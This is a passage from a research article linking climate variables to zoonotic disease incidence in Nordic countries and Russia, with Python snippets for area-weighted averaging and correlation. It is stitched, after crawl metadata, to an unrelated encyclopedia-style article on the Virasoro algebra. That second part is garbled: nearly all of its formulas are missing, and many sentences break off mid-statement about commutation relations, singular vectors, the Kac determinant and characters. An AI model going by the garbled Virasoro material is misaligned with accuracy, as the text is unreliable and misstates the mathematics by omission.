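    keep = np.asarray(frac_in_district, dtype=float) >= min_frac
    return float(np.average(v[keep], weights=w[keep]))

# Toy data: the middle cell lies mostly outside the district and is dropped
temps = [1.0, 2.0, 3.0]       # cell mean temperatures
areas = [1.0, 1.0, 2.0]       # cell areas (arbitrary units)
fracs = [0.6, 0.4, 1.0]       # fraction of each cell inside the district
mean_t = district_mean(temps, areas, fracs)  # (1*1 + 3*2) / 3 ≈ 2.33
```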
The statistical relationships between reported disease and climate data were analyzed using Spearman’s correlation coefficient and stepwise regression (significance level p < 0.01; see further “Methods”). Consistent spatial aggregation of both climate and disease data over various scales was also used to distinguish a possible emerging large-scale signal from the noise of geographic/spatial variability in the climate-disease relationships. The different scales considered were sub-national, national, and the south/north parts of and the whole multi-national Northern/Arctic Region spanned by the different countries/country parts with data. Such multi-scale exploration of climate-disease relationships reveals their local variability, the degree to which this is dampened on larger scales to reveal a clearer overarching regional relationship pattern, and the representativeness of this pattern for various parts of the region.
Results and discussion
Climate change in the Northern/Arctic Region
During the entire study period, determined by relevant data coverage (1995–2015), the climate has overall become warmer and wetter across the Northern/Arctic Region (Fig. 1a), with mean annual temperature and precipitation both increasing from the first (1995–2005) to the second (2005–2015) half of the period (Supplementary Fig. S1a,b). Changes in average monthly values differ among months and seasons (Fig. 1b,c; Supplementary Fig. S1c,d). All countries or areas studied, i.e., those with relevant data availability in the region (Fig. 1a), display similar patterns of change in monthly temperature, with the highest increases during March-June and September-December, and declines around February (Fig. 1b). This implies warming in spring, summer, and autumn, but little change in average winter temperature (Supplementary Fig. S1c). The seasonal changes in precipitation vary more, including in direction of change, among countries or country parts than temperature does (Fig. 1c; Supplementary Fig. S1d). On average, the precipitation changes are relatively small across the study region, although still with considerable overall increases emerging during June–August and November–December.
Changes in annual incidence of diseases
Disease incidences are unevenly distributed among the countries/country parts studied across the Northern/Arctic Region. For example, annual incidences of TBE in eastern Russia (Fig. 2e) and that of Puumala virus infection in Finland (Fig. 2f) are markedly higher than elsewhere in the region. Furthermore, average incidence levels vary between the diseases, with Q fever having the lowest annual incidence level (5-year running mean) of less than 0.1 cases per 100,000 inhabitants (Fig. 2d). In general, the incidences of borreliosis (Fig. 2a) and that of cryptosporidiosis (Fig. 2g) show an increasing trend, both nationally and regionally (Supplementary Fig. S2), while that of leptospirosis (Fig. 2c) and TBE (Fig. 2e) show region-scale decline (black lines) but with some regional increases in certain countries (thin colored lines; see also Supplementary Fig. S2). The other diseases show no clear regional trends in incidence, but rather variations around more or less stable region-average levels (Fig. 2b,d,f; Supplementary Fig. S2).
Disease incidence level and trends may also differ between the northern and southern parts of the study region, divided by latitude 63°N (Supplementary Fig. S3). The incidences of tularemia, TBE, and Puumala virus infection are higher in the north than in the south (Fig. 3b,e,f), even though the southern part has considerably higher population density (Supplementary Fig. S4). Regarding change trends, borreliosis, leptospirosis, TBE, and Puumala virus infection change in the same direction in both parts as over the whole region (Fig. 3a,c,e,f, Supplementary Fig. S5). This implies that the whole-region trend is representative of a general change pattern for these diseases over the study region. In contrast, the incidence of tularemia changes in opposite directions in the northern and southern parts of the region (Fig. 3b). This implies a more considerable geographic variability for this disease, which is dampened and masked in large-scale averaging so that the whole-region trend becomes small and hardly noticeable. This may also indicate that the spatial foci of this disease have expanded or shifted within the region. Regarding Q fever, this is more common in the south (Fig. 3d), so the overall whole-region trend is dominated by the change trend in the south, while cryptosporidiosis shows several striking temporal peaks in the north, and a relatively low increasing change trend in the south (Fig. 3g), which in combination lead to the clearly increasing whole-region trend for this disease.
Correlations between the diseases and climate variables
In the whole-region analysis, six of the seven target diseases (borreliosis, leptospirosis, TBE, Puumala virus infection, cryptosporidiosis, Q fever) show significant relationships with multiple climate variables, with Spearman’s correlation coefficient 0.61 ≤ |ρ| ≤ 0.98, p < 0.01 (Supplementary Table S1). Specifically, incidence of borreliosis, Puumala virus infection, and cryptosporidiosis show strong positive relationships with autumn temperature (Spearman’s ρ = 0.75), annual maximum monthly precipitation (ρ = 0.82), and mean temperature of the wettest quarter (ρ = 0.85). TBE and leptospirosis, both of which decrease over the study period, show negative relationships with spring precipitation (ρ = − 0.98) and spring temperature (ρ = − 0.95). Q fever shows no obvious trend in incidence, but is still correlated negatively with annual minimum monthly precipitation (ρ = − 0.71). Tularemia does not show significant correlations with any selected climate variable.
These results are to some degree consistent with qualitative assessment propositions for climate sensitivity of various diseases in Europe9. However, TBE and leptospirosis exhibit decreases, rather than increases, under the overall warming and wetting trends actually experienced in the Northern/Arctic Region over the study period with data availability, with these findings discussed further below. Tularemia has been identified as a possible CSI in other assessments9,19 but does not emerge as such in the present whole-region analysis. This is likely due to the large variability in disease change trends, which are also in opposite directions in different parts of the region and thereby counteract each other in the region-scale averaging of local trends. This counteracting trend variability is, for example, seen between the southern and northern trends in later years in Fig. 3, and has also been reported for tularemia over different parts of Sweden20.
Figure 4 shows the climate variables that emerge from the statistical analysis as being most closely related to the incidence of each CSI, with the analysis also including stepwise regression to avoid mutual correlation between variables (Supplementary Table S2). The results indicate the following ranking of the strongest identified proxy climate-disease relationships (R² ≥ 0.8) for five of the seven target CSIs studied: borreliosis with autumn temperature (R² = 0.8, Fig. 4a); leptospirosis with spring temperature (R² = 0.9, Fig. 4b); TBE with spring precipitation (R² = 0.8, Fig. 4c); Puumala virus infection with annual maximum monthly precipitation (R² = 0.8, Fig. 4d); and cryptosporidiosis with mean temperature of the wettest quarter (R² = 0.9, Fig. 4e). Q fever correlates only with annual minimum monthly precipitation and with a weak correlation (R² = 0.5) (Fig. 4f).
The strongest disease correlations with climate variables are thus temperature-related for borreliosis and leptospirosis, water-related for Puumala virus infection, TBE and Q fever, and both temperature and water (hydro-climatically) related for cryptosporidiosis. The negative relationships with hydro-climate observed for leptospirosis (Fig. 4b) and TBE (Fig. 4c) imply decreases, rather than increases, in these diseases with the temperature and precipitation increases experienced over the two decades of the study period (1995–2015) and also projected for the future climate over the study region2.
In further analysis of the northern and southern parts of the region, somewhat different climate-disease correlations might be expected due to the various disease change trends exhibited in the different smaller-scale parts (Fig. 3). For example, TBE shows no clear climate sensitivity at the smaller scales due to the relatively small incidence trends at these scales. In combination, however, the similarly directed smaller-scale trends lead to a clear decreasing trend over the whole region. Tularemia, with more highly variable smaller-scale trends, including in opposite directions, emerges as correlated with spring temperature in the north, due to a clear increasing trend in annual incidence in this part of the region (Supplementary Table S2). This is counteracted by the decrease trend exhibited in the southern part of the region and thereby masked in the aggregated whole-region trend. Borreliosis shows fully consistent whole-region and smaller-scale correlations with the same two climate variables, autumn and spring temperature (Supplementary Table S2). This indicates a likely strong sensitivity of borreliosis to these two variables, persisting across different spatial scales and parts of the region.
Comparison with evidence from previous studies
The results of our large-scale data analysis show some consistency with local observations and mechanistic explanations, but also differences that are likely due to unrelated factors. At whole-region scale, the incidences of TBE are negatively correlated with all (hydro-)climate variables, while those of borreliosis are positively correlated with all climate variables. This is despite the fact that these diseases share the same vector, Ixodidae ticks, for which increased annual temperature is reported to increase incidences of tick bites21 and the geographic range of ticks, due to the expanded geographic range of associated vegetation communities and mammals caused by a prolonged vegetation period22. Some researchers have also argued that the reporting of tick bites has increased due to increased public awareness23 and more time spent outdoors24, along with the changes in climate, tick bites, and tick range. The decreasing trend in TBE incidence, in spite of these tick-increase drivers, might therefore be explained by other, counteracting societal factors, such as vaccination rates increasing along with the climate and disease-reporting factors.
A previous study concluded that leptospirosis is positively correlated with rainfall and temperature25. However, consistent with findings in other previous studies26, the results of our data-driven analysis for cryptosporidiosis show significant positive correlations with temperature variables, but a negative correlation with annual maximum precipitation. Climate-independent societal factors, such as improved sanitation and increased public awareness, may also play a role in the present empirical findings of decreased leptospirosis under the overall warming and wetting experienced in the study region.
The predominantly water-driven increase in Puumala virus infection with increasing summer and autumn precipitation is consistent with reported positive correlations of the rodent disease-host population with heavy rainfall27. The significant infection increase with higher temperature of the driest quarter is likely also hydro-climatically related, consistent with less snow cover during milder winters, when decreasing host protection forces the disease hosts closer to human settlements28.
Q fever has been found to be related to droughts10 due to its wind-borne transmission pathway, and mainly emerges following droughts. The negative correlation observed here between Q fever and annual minimal precipitation is to some degree explainable by this mechanism.
Limitations of the study
A primary limitation of this study is that reported laboratory disease data may not represent actual infection in the community, because some of the infections are mild or even subclinical, so that infected people might not seek healthcare. To estimate the true prevalence of infections, serology would need to be used as a complement in population-based studies. However, serological tests are only performed in specific studies and are not currently used as a tool for monitoring trends in infectious diseases. In addition, some diseases are not notifiable in all countries because of significant historical differences in the registration of epidemic data29, which makes it more difficult to obtain such data for comparable studies across borders.
A second limitation is that the results do not reveal the mechanistic causal relationships that underlie the statistical correlations, and thus need to be interpreted with caution. The strong correlations observed may be caused by either direct or indirect impacts, or even other unrelated factors, and include spurious correlations. However, the focus of this study is on data-based distinction of possible clear long-term, large-scale statistical signals in climate-disease relationships, consistent with the climate-change driver that is, by definition, long-term and large scale, different from the noise of shorter-term, smaller-scale weather-disease variations. This focus implies that the general limitation of statistical correlations versus mechanistic relationships is unavoidable in such a study, and both of these complementary types of analysis are needed and should be compared with each other to move the field forward.
Overall, the large variability in local incidences of the target diseases around and compared with the large-scale region-average conditions (Fig. 2) implies that disease studies performed for different site-specific geographic locations using various scales of supporting data may lead to apparently contradictory or inconsistent results that may or may not be representative of average disease characteristics and change trends emerging over larger regional scales. Across the large regional scale of the entire Northern/Arctic Region (Fig. 1a), our empirical findings suggest significant overarching climate sensitivity of six human diseases (Fig. 4). The negative correlations of TBE and leptospirosis with recent warming and wetting in this region may be surprising and call for further data-driven, large-scale disease studies, as well as targeted mechanistic theoretical and laboratory studies. Climate-independent societal trends, such as general vaccination, sanitation, and public awareness improvements, may coincide with climate change trends and confuse cause-effect attributions for disease trends. This calls for further studies that also include data for such relevant societal factors, as well as consistent comparison of disease trends across different countries and regions. However, data-driven studies that link disease and climate trends are useful also in the absence of additional societal data, as they can identify and point out disease trend scenarios without societal mitigation interventions, and thereby support empirically based assessment and prioritization of needs for such interventions.
Disease data for the regional dataset are compiled from laboratory reported incidence for the seven zoonotic diseases chosen covering six Northern/Arctic countries and regions (Greenland, Iceland, Norway, Sweden, Finland, and parts of northern Russia). The countries are represented by 32 to 86 districts, with the longest records from 1969 to 2016. We ignored regions with less than 10 years of data prior to 2015, and thus retained data only for Norway, Sweden, Finland, and Russia. However, not all diseases are notifiable in all studied countries; for example, borreliosis is not notifiable in Sweden and leptospirosis is not notifiable in Norway29. Annual incidence of a disease in each country or in the entire region was calculated as the total reported absolute cases divided by the total population in the selected reporting districts. Whole-region incidence was assessed only over the continuous sequence of years for which data were missing from at most one country or country part (the eastern or western part of Russia). Therefore, Q fever has a time series of annual incidence from 1998 to 2015, TBE from 2002 to 2015, cryptosporidiosis from 2004 to 2016, and the other diseases from 1995 to 2015.
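The incidence definition above (total reported cases divided by total population over the selected reporting districts, expressed per 100,000 inhabitants as in Fig. 2) can be sketched as follows; the function name and toy data are assumptions for illustration:

```python
def annual_incidence(cases_by_district, pop_by_district):
    """Annual incidence per 100,000 inhabitants for one year.

    cases_by_district / pop_by_district: mappings district -> reported
    cases and population; incidence is total cases over total population,
    following the paper's definition.
    """
    total_cases = sum(cases_by_district.values())
    total_pop = sum(pop_by_district.values())
    return 100_000 * total_cases / total_pop

# Toy data: 15 cases among 300,000 inhabitants → 5.0 per 100,000
inc = annual_incidence({"d1": 10, "d2": 5}, {"d1": 200_000, "d2": 100_000})
```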
Twenty-two climate variables were selected and calculated from the Climate Research Unit’s (CRU) version 4.04 high-resolution gridded dataset15. These were annual mean, maximum, and minimum monthly and seasonal temperature and precipitation, along with temperature and precipitation of the warmest, coldest, wettest, and driest quarter. No missing data appeared in the study region. Grid cells with at least 50% of their area located in the selected districts of the respective disease in the previous step were area-weighted averaged to obtain values for the entire region. The warmest quarter coincides with the summer months (June–August), so in this case the temperature or precipitation of the warmest quarter is represented by the same data as those for the summer. The coldest quarter is also essentially the same as winter (December-February), except in the year 1992/1993, when the coldest quarter was shifted to 1 month earlier than the normal winter period. The wettest quarter varies between summer and autumn months (June–September), and the driest quarter between winter and spring months (January-May).
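Deriving the quarter-based variables from monthly data can be illustrated for the mean temperature of the wettest quarter. This simplified sketch scans the ten consecutive 3-month windows within a calendar year (no wrapping across the year boundary, which may differ from some bioclimatic-variable conventions); the function name and toy data are assumptions:

```python
import numpy as np

def wettest_quarter_temp(monthly_temp, monthly_prec):
    """Mean temperature of the wettest 3-month window within the year.

    Scans the ten consecutive windows Jan–Mar … Oct–Dec for the largest
    precipitation sum; ties resolve to the earliest window.
    """
    t = np.asarray(monthly_temp, dtype=float)
    p = np.asarray(monthly_prec, dtype=float)
    sums = np.array([p[i:i + 3].sum() for i in range(10)])
    start = int(sums.argmax())  # first window in case of ties
    return float(t[start:start + 3].mean())

prec = [10.0] * 12
prec[6] = 100.0                 # July is by far the wettest month
temp = list(range(12))          # toy temperatures: 0 (Jan) … 11 (Dec)
wq_temp = wettest_quarter_temp(temp, prec)  # May–July window → mean of 4, 5, 6
```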
To make comparisons between the north (low population density) and the south (high population density) for the trends in the diseases and their correlations with climate variables, the European part (excluding eastern Russia) of the study region, based on the centroid of each district, was divided into two parts by latitude 63°N. Annual incidence of diseases and climate data for the two constituent southern and northern parts were calculated with the same methods as for the whole region.
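The north/south division by district centroid described above amounts to a simple latitude threshold. A minimal sketch, with hypothetical district names and centroid coordinates:

```python
def split_by_latitude(centroids, threshold=63.0):
    """Partition districts into northern and southern sets by centroid latitude.

    centroids: mapping district -> (lat, lon). Districts with centroid at
    or above the threshold latitude are assigned to the north.
    """
    north = {d for d, (lat, _lon) in centroids.items() if lat >= threshold}
    south = set(centroids) - north
    return north, south

# Hypothetical example districts
north, south = split_by_latitude({"Umeå": (63.8, 20.3), "Stockholm": (59.3, 18.1)})
```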
Spearman correlation analysis was conducted to investigate relationships between diseases and climate variables. Statistical significance was set to p < 0.01. We applied a 5-year running mean filter to both datasets, on the one hand to be consistent with the “long-term” concept of climate and on the other hand to avoid lack of freedom in the later regression. We then used stepwise (combined forward and backward) regression analysis to identify statistically significant variables contributing to variations in the incidence of each disease, while minimizing the effect of collinearity among variables. Candidate climate variables fed into stepwise regression are those with significance level p < 0.01 in Spearman correlation analysis. A variable is considered for addition or subtraction based on the significance level, which was again set at p < 0.01.
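The core of the correlation step (5-year running mean smoothing of both series, then Spearman rank correlation) can be sketched as below. This is a simplified illustration only: it omits the significance testing and the stepwise regression, and the Spearman implementation assumes no tied values; in practice, library routines (e.g., from SciPy/statsmodels) would handle ties and p-values:

```python
import numpy as np

def running_mean(x, window=5):
    """Centered moving average; the series shortens by window - 1 points."""
    return np.convolve(np.asarray(x, dtype=float),
                       np.ones(window) / window, mode="valid")

def spearman_rho(x, y):
    """Spearman rank correlation (simple version, no tie correction)."""
    rx = np.argsort(np.argsort(x)).astype(float)
    ry = np.argsort(np.argsort(y)).astype(float)
    rx -= rx.mean()
    ry -= ry.mean()
    return float((rx * ry).sum() / np.sqrt((rx ** 2).sum() * (ry ** 2).sum()))

# Toy monotone series: smoothing preserves the ordering, so rho = 1.0
years = np.arange(1995, 2016)
incidence = 0.1 * (years - 1995) ** 2      # hypothetical disease incidence
temperature = 0.05 * (years - 1995)        # hypothetical climate variable
rho = spearman_rho(running_mean(incidence), running_mean(temperature))
```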
All the data used in our analyses are available online. Data on the epidemiology and geography of infectious diseases are published in the CLINF GIS Public Data Repository (https://clinf.org/home/clinf-geographic-information-system/). Monthly data on the climate variables were obtained from high-resolution gridded datasets of the Climate Research Unit (CRU) (https://catalogue.ceda.ac.uk/uuid/89e1e34ec3554dc98594a5732622bce9), and aggregated to the relevant spatiotemporal scale for linking with corresponding disease data.
IPCC. Global Warming of 1.5 °C. An IPCC Special Report on the impacts of global warming of 1.5 °C above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change, sustainable development, and efforts to eradicate poverty (eds Masson-Delmotte, V. et al.) (2018, in press).
IPCC. Climate Change 2014: Synthesis Report. Contribution of working groups I, II and III to the fifth assessment report of the intergovernmental panel on climate change (eds Core Writing Team, et al.) 151 (2014).
Pecl, G. T. et al. Biodiversity redistribution under climate change: Impacts on ecosystems and human well-being. Science 355, eaai9214 (2017).
Smith, K. R. & Woodward, A. Human health: impacts, adaptation, and co-benefits. In Climate Change 2014: Impacts, Adaptation, and Vulnerability. Part A: Global and Sectoral Aspects. Contribution of Working Group II to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change 709–754. https://www.ipcc.ch/report/ar5/wg2/human-health-impacts-adaptation-and-co-benefits/ (2014).
Thierfelder, T. & Evengård, B. CLINF: an integrated project design. In Nordic Perspectives on the Responsible Development of the Arctic: Pathways to Action (ed. Nord, D. C.) 71–92 (Springer International Publishing, 2021) https://doi.org/10.1007/978-3-030-52324-4_4.
Moritz, R. E., Bitz, C. M. & Steig, E. J. Dynamics of recent climate change in the Arctic. Science 297, 1497–1502 (2002).
Karlsson, J. M., Jaramillo, F. & Destouni, G. Hydro-climatic and lake change patterns in Arctic permafrost and non-permafrost areas. J. Hydrol. 529, 134–145 (2015).
Selroos, J.-O., Cheng, H., Vidstrand, P. & Destouni, G. Permafrost thaw with thermokarst wetland-lake and societal-health risks: Dependence on local soil conditions under large-scale warming. Water 11, 574 (2019).
Lindgren, E., Andersson, Y., Suk, J. E., Sudre, B. & Semenza, J. C. Monitoring EU emerging infectious disease risk due to climate change. Science 336, 418–419 (2012).
Omazic, A. et al. Identifying climate-sensitive infectious diseases in animals and humans in Northern regions. Acta Vet. Scand. 61, 53 (2019).
Waits, A., Emelyanova, A., Oksanen, A., Abass, K. & Rautio, A. Human infectious diseases and the changing climate in the Arctic. Environ. Int. 121, 703–713 (2018).
Thierfelder, T., Berggren, C., Omazic, A. & Evengård, B. Metadata concerning the diseases maps stored under the directory “Human CSI”. https://clinf.org/home/clinf-geographic-information-system/ (2019).
Altizer, S., Ostfeld, R. S., Johnson, P. T. J., Kutz, S. & Harvell, C. D. Climate change and infectious diseases: From evidence to a predictive framework. Science 341, 514–519 (2013).
Hijmans, R. J., Cameron, S. E., Parra, J. L., Jones, P. G. & Jarvis, A. Very high resolution interpolated climate surfaces for global land areas. Int. J. Climatol. 25, 1965–1978 (2005).
Harris, I., Osborn, T. J., Jones, P. & Lister, D. Version 4 of the CRU TS monthly high-resolution gridded multivariate climate dataset. Sci. Data 7, 109 (2020).
Angelakis, E. & Raoult, D. Q fever. Vet. Microbiol. 140, 297–309 (2010).
Chen, X.-M., Keithly, J. S., Paya, C. V. & LaRusso, N. F. Cryptosporidiosis. N. Engl. J. Med. 346, 1723–1731 (2002).
Malkhazova, S., Mironova, V., Shartova, N. & Orlov, D. Mapping Russia’s Natural Focal Diseases: History and Contemporary Approaches (Springer Nature, 2019).
Ma, Y., Bring, A., Kalantari, Z. & Destouni, G. Potential for hydroclimatically driven shifts in infectious disease outbreaks: The case of tularemia in high-latitude regions. Int. J. Environ. Res. Public Health 16, 3717 (2019).
Ma, Y., Vigouroux, G., Kalantari, Z., Goldenberg, R. & Destouni, G. Implications of projected hydroclimatic change for tularemia outbreaks in high-risk areas across Sweden. Int. J. Environ. Res. Public Health 17, 6786 (2020).
Vladimirov, L. N. et al. Quantifying the northward spread of ticks (Ixodida) as climate warms in Northern Russia. Atmosphere 12, 233 (2021).
Jaenson, T. G. T. & Lindgren, E. The range of Ixodes ricinus and the risk of contracting Lyme borreliosis will increase northwards when the vegetation period becomes longer. Ticks Tick Borne Dis. 2, 44–49 (2011).
Scott, J., & Scott, C. Lyme disease propelled by borrelia burgdorferi-infected blacklegged ticks, wild birds and public awareness—Not climate change. J. Vet. Sci. Med. 6, 01–08 (2018).
Kilpatrick, A. M. & Randolph, S. E. Drivers, dynamics, and control of emerging vector-borne zoonotic diseases. Lancet 380, 1946–1955 (2012).
Lau, C. L., Smythe, L. D., Craig, S. B. & Weinstein, P. Climate change, flooding, urbanisation and leptospirosis: Fuelling the fire?. Trans. R. Soc. Trop. Med. Hyg. 104, 631–638 (2010).
Ikiroma, I. A. & Pollock, K. G. Influence of weather and climate on cryptosporidiosis—A review. Zoonoses Public Health 68, 285–298 (2020).
Gubler, D. J. et al. Climate variability and change in the United States: Potential impacts on vector- and rodent-borne diseases. Environ. Health Perspect. 109, 223–233 (2001).
Evander, M. & Ahlm, C. Milder winters in northern Scandinavia may contribute to larger outbreaks of haemorrhagic fever virus. Glob. Health Action 2, 2020 (2009).
Omazic, A., Berggren, C., Thierfelder, T., Koch, A. & Evengard, B. Discrepancies in data reporting of zoonotic infectious diseases across the Nordic countries—A call for action in the era of climate change. Int. J. Circumpolar Health 78, 1601991 (2019).
We are thankful for the support from the Nordforsk Centre of Excellence CLINF (grant number 76413). We acknowledge the Climatic Research Unit (CRU) for providing well-constructed data for our study.
Open access funding provided by Stockholm University. This work was supported by the Nordforsk Centre of Excellence CLINF (grant number 76413).
The authors declare no competing interests.
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.
About this article
Cite this article
Ma, Y., Destouni, G., Kalantari, Z. et al. Linking climate and infectious disease trends in the Northern/Arctic Region. Sci Rep 11, 20678 (2021). https://doi.org/10.1038/s41598-021-00167-z
By submitting a comment you agree to abide by our Terms and Community Guidelines. If you find something abusive or that does not comply with our terms or guidelines please flag it as inappropriate. | <urn:uuid:8ee2bec3-4550-44ab-855e-7bac1d74798d> | CC-MAIN-2023-14 | https://www.nature.com/articles/s41598-021-00167-z?error=cookies_not_supported | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949689.58/warc/CC-MAIN-20230331210803-20230401000803-00410.warc.gz | en | 0.904147 | 6,898 | 2.609375 | 3 |
Virasoro algebra explained
In mathematics, the Virasoro algebra (named after the physicist Miguel Ángel Virasoro) is a complex Lie algebra and the unique central extension of the Witt algebra. It is widely used in two-dimensional conformal field theory and in string theory.
The Virasoro algebra is spanned by generators for and the central charge .These generators satisfy
and The factor of
is merely a matter of convention. For a derivation of the algebra as the unique central extension of the Witt algebra
, see derivation of the Virasoro algebra.
The Virasoro algebra has a presentation in terms of two generators (e.g. 3 and −2) and six relations.
Highest weight representations
A highest weight representation of the Virasoro algebra is a representation generated by a primary state: a vector
where the number is called the conformal dimension or conformal weight of
A highest weight representation is spanned by eigenstates of
. The eigenvalues take the form
, where the integer
is called the level of the corresponding eigenstate.
More precisely, a highest weight representation is spanned by
-eigenstates of the type
, whose levels are
. Any state whose level is not zero is called a descendant state of
is the largest possible highest weight representation. (The same letter is used for both the element of the Virasoro algebra and its eigenvalue in a representation.)
form a basis of the Verma module. The Verma module is indecomposable, and for generic values of and it is also irreducible. When it is reducible, there exist other highest weight representations with these values of and, called degenerate representations, which are cosets of the Verma module. In particular, the unique irreducible highest weight representation with these values of and is the quotient of the Verma module by its maximal submodule.
A Verma module is irreducible if and only if it has no singular vectors.
A singular vector or null vector of a highest weight representation is a state that is both descendent and primary.
A sufficient condition for the Verma module
to have a singular vector at the level
for some positive integers
)2-(br+b-1s)2) , where c=1+6(b+b-1)2 .
, and the reducible Verma module
has a singular vector
at the level
, and the corresponding reducible Verma module has a singular vector
at the level
This condition for the existence of a singular vector at the level
is not necessary. In particular, there is a singular vector at the level
. This singular vector is now a descendent of another singular vector at the level
. This type of singular vectors can however only exist if the central charge is of the type
coprime, these are the central charges of the minimal models
Hermitian form and unitarity
A highest weight representation with a real value of
has a unique Hermitian form such that the Hermitian adjoint of
and the norm of the primary state is one.The representation is called unitary
if that Hermitian form is positive definite. Since any singular vector has zero norm, all unitary highest weight representations are irreducible.
The Gram determinant of a basis of the level
is given by the Kac determinant formula
where the function p
) is the partition function
is a positive constant that does not depend on
. The Kac determinant formula was stated by V. Kac
(1978), and its first published proof was given by Feigin and Fuks (1984).
The irreducible highest weight representation with values and is unitary if and only if either ≥ 1 and ≥ 0, or
is one of the values
= 1, 2, 3, ..., m
− 1 and s
= 1, 2, 3, ..., r
Daniel Friedan, Zongan Qiu, and Stephen Shenker (1984) showed that these conditions are necessary, and Peter Goddard, Adrian Kent, and David Olive (1986) used the coset construction or GKO construction (identifying unitary representations of the Virasoro algebra within tensor products of unitary representations of affine Kac–Moody algebras) to show that they are sufficient.
The character of a representation
of the Virasoro algebra is the function
} q^.The character of the Verma module
}(q) = \frac = \frac=q^\left(1+q+2q^2+3q^3+5q^4+\cdots\right), where
is the Dedekind eta function
, the Verma module
is reducible due to the existence of a singular vector at level
. This singular vector generates a submodule, which is isomorphic to the Verma module
. The quotient of
by this submodule is irreducible if
does not have other singular vectors, and its character is
} = \chi_ -\chi_ = (1-q^) \chi_.
is in the Kac table of the corresponding minimal model
). The Verma module
has infinitely many singular vectors, and is therefore reducible with infinitely many submodules. This Verma module has an irreducible quotient by its largest nontrivial submodule. (The spectrums of minimal models are built from such irreducible representations.) The character of the irreducible quotient is
}-\chi_\right).\endThis expression is an infinite sum because the submodules
have a nontrivial intersection, which is itself a complicated submodule.
Conformal field theory
In two dimensions, the algebra of local conformal transformations is made of two copies of the Witt algebra.It follows that the symmetry algebra of two-dimensional conformal field theory is the Virasoro algebra. Technically, the conformal bootstrap approach to two-dimensional CFT relies on Virasoro conformal blocks, special functions that include and generalize the characters of representations of the Virasoro algebra.
Since the Virasoro algebra comprises the generators of the conformal group of the worldsheet, the stress tensor in string theory obeys the commutation relations of (two copies of) the Virasoro algebra. This is because the conformal group decomposes into separate diffeomorphisms of the forward and back lightcones. Diffeomorphism invariance of the worldsheet implies additionally that the stress tensor vanishes. This is known as the Virasoro constraint, and in the quantum theory, cannot be applied to all the states in the theory, but rather only on the physical states (compare Gupta–Bleuler formalism).
Super Virasoro algebras
See main article: Super Virasoro algebra. There are two supersymmetric N = 1 extensions of the Virasoro algebra, called the Neveu–Schwarz algebra and the Ramond algebra. Their theory is similar to that of the Virasoro algebra, now involving Grassmann numbers. There are further extensions of these algebras with more supersymmetry, such as the N = 2 superconformal algebra.
See main article: W-algebra. W-algebras are associative algebras which contain the Virasoro algebra, and which play an important role in two-dimensional conformal field theory. Among W-algebras, the Virasoro algebra has the particularity of being a Lie algebra.
Affine Lie algebras
See main article: affine Lie algebra. The Virasoro algebra is a subalgebra of the universal enveloping algebra of any affine Lie algebra, as shown by the Sugawara construction. In this sense, affine Lie algebras are extensions of the Virasoro algebra.
Meromorphic vector fields on Riemann surfaces
The Virasoro algebra is a central extension of the Lie algebra of meromorphic vector fields with two poles on a genus 0 Riemann surface.On a higher-genus compact Riemann surface, the Lie algebra of meromorphic vector fields with two poles also has a central extension, which is a generalization of the Virasoro algebra. This can be further generalized to supermanifolds.
Vertex algebras and conformal algebras
The Virasoro algebra also has vertex algebraic and conformal algebraic counterparts, which basically come from arranging all the basis elements into generating series and working with single objects.
The Witt algebra (the Virasoro algebra without the central extension) was discovered by É. Cartan (1909). Its analogues over finite fields were studied by E. Witt in about the 1930s. The central extension of the Witt algebra that gives the Virasoro algebra was first found (in characteristic p > 0) by R. E. Block (1966, page 381) and independently rediscovered (in characteristic 0) by I. M. Gelfand and Dmitry Fuchs (1968). Virasoro (1970) wrote down some operators generating the Virasoro algebra (later known as the Virasoro operators) while studying dual resonance models, though he did not find the central extension. The central extension giving the Virasoro algebra was rediscovered in physics shortly after by J. H. Weis, according to Brower and Thorn (1971, footnote on page 167).
- . 1984 . Infinite conformal symmetry in two-dimensional quantum field theory . . 241 . 333–380 . 10.1016/0550-3213(84)90052-X . 2. 1984NuPhB.241..333B .
- R. E. Block . 1966 . On the Mills–Seligman axioms for Lie algebras of classical type . . 121 . 378–392 . 1994485 . 10.1090/S0002-9947-1966-0188356-3 . 2. free .
- R. C. Brower . C. B. Thorn . 1971 . Eliminating spurious states from the dual resonance model . . 31 . 1 . 163–182 . 10.1016/0550-3213(71)90452-4. 1971NuPhB..31..163B . .
- E. Cartan . 1909 . Les groupes de transformations continus, infinis, simples . Annales Scientifiques de l'École Normale Supérieure . 26 . 93–161 . 40.0193.02 . 10.24033/asens.603. free .
- B. L. Feigin, D. B. Fuchs, Verma modules over the Virasoro algebra L. D. Faddeev (ed.) A. A. Mal'tsev (ed.), Topology. Proc. Internat. Topol. Conf. Leningrad 1982, Lect. notes in math., 1060, Springer (1984) pp. 230–245
- Friedan, D., Qiu, Z. and Shenker, S. . 1984 . Conformal invariance, unitarity and critical exponents in two dimensions . . 52 . 1575–1578 . 10.1103/PhysRevLett.52.1575 . 18. 1984PhRvL..52.1575F . 122320349 . .
- I.M. Gel'fand, D. B. Fuchs, The cohomology of the Lie algebra of vector fields in a circle Funct. Anal. Appl., 2 (1968) pp. 342–343 Funkts. Anal. i Prilozh., 2 : 4 (1968) pp. 92–93
- P. Goddard, A. Kent . D. Olive . amp . 1986 . Unitary representations of the Virasoro and super-Virasoro algebras . . 103 . 1 . 105–119 . 0826859 . 0588.17014 . 10.1007/BF01464283. 1986CMaPh.103..105G . 91181508 . .
- A. Kent . 1991 . Singular vectors of the Virasoro algebra . . 273 . 1–2 . 56–62 . 10.1016/0370-2693(91)90553-3. hep-th/9204097 . 1991PhLB..273...56K . 15105921 .
- V. G. Kac, "Highest weight representations of infinite dimensional Lie algebras", Proc. Internat. Congress Mathematicians (Helsinki, 1978), pp.299-304
- V. G. Kac, A. K. Raina, Bombay lectures on highest weight representations, World Sci. (1987) .
